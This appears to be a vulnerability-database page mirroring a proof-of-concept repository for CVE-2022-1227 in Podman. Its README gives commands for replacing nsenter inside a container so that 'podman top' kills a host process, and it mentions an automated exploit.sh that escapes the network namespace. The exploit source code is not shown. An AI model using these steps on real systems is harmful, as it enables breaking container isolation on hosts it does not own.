CVE-2022-1227 PoC — Podman 权限许可和访问控制问题漏洞

来源

关联漏洞

Description

A script for exploiting CVE-2022-1227

介绍

# CVE-2022-1227_Exploit

A script for exploiting CVE-2022-1227.

## Background

- Ubuntu `20.10` is recommanded.
- Podman <`4.0.0`; `3.4.4` is recommanded.

> TODO: add what is the principle of this vulnerability

## Install podman

Follow the instruction in the official document:
<https://podman.io/getting-started/installation#installing-on-linux>

For Ubuntu `20.10`, the imstall command should be:

```bash
sudo apt-get install podman=3.4.4+ds1-1ubuntu1
```

## Quick Start

### Simple Exploit

In this section we try a simple PoC to break the bundary of `PID namespace` and `kill` a process in the host.

Here are the steps:

1. Run a container by the following command: `podman run --userns=keep-id --rm -d ubuntu:latest sleep infinity`
2. Run `keep` in `./exp/bin` and get the `PID` it is running. Usually it will display its PID on the terminal. As the binary are set to sleep for 600 seconds, maybe you must be quick to finish the follow steps.

    ```plaintext
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./exp/bin/keep
    My process ID is: 7719
    Put this number to `PID` in the sendsig.c and compile!
    ```

3. Edit the source code in `./exp/src/sendsig.c` and fill in the PID obtained in the previous step in variable `pid`.

   ```c
   int pid = OLD_VAL;
   ```

   to

   ```c
   int pid = 7719;
   ```

4. Put the compiled binary to the internal podman: `podman cp ./exp/bin/sendsig $container_name :/usr/bin/nsenter`
5. Run `podman top` to trigger vulnerability by: `podman top -l`
6. If everything goes right, the running process `keep` will be killed immediately. This is unusual, because normally processes inside the container cannot send signal to processes on the host due to the PID namespace isolation.

    ```plaintext
    tems@tems-virtual-machine:~/Applications/CVE-2022-1227$ ./keep
    My process ID is: 7719
    Killed
    ```

## Full exploit

In this section, we use sockets to realize the inter-process socket communication between the client in the container and the server on the host, which is usually impossible when the isolation mechanism is complete. We use this vulnerability to break through the isolation of net namespace to realize this exploit.

First, enter the directory by `cd ./exp`;

By simply running `./exploit.sh`, everything will be done automatically; if everything goes right, the server will display:

```plaintext
Hello from the container!
```

It means we go across the network namespace and escape.

文件快照

 [4.0K]  /data/pocs/57f240dc830bbcd3a7f10a21868565e3f36900de
├── [4.0K]  exp
│   ├── [4.0K]  bin
│   │   ├── [ 16K]  keep
│   │   ├── [ 16K]  socket_client
│   │   └── [ 16K]  socket_server
│   ├── [1.0K]  exploit.sh
│   └── [4.0K]  src
│       ├── [ 378]  keep.c
│       ├── [ 490]  sendsig.c
│       ├── [ 953]  socket_client.c
│       └── [1.3K]  socket_server.c
├── [ 11K]  LICENSE
└── [2.4K]  README.md

3 directories, 10 files

备注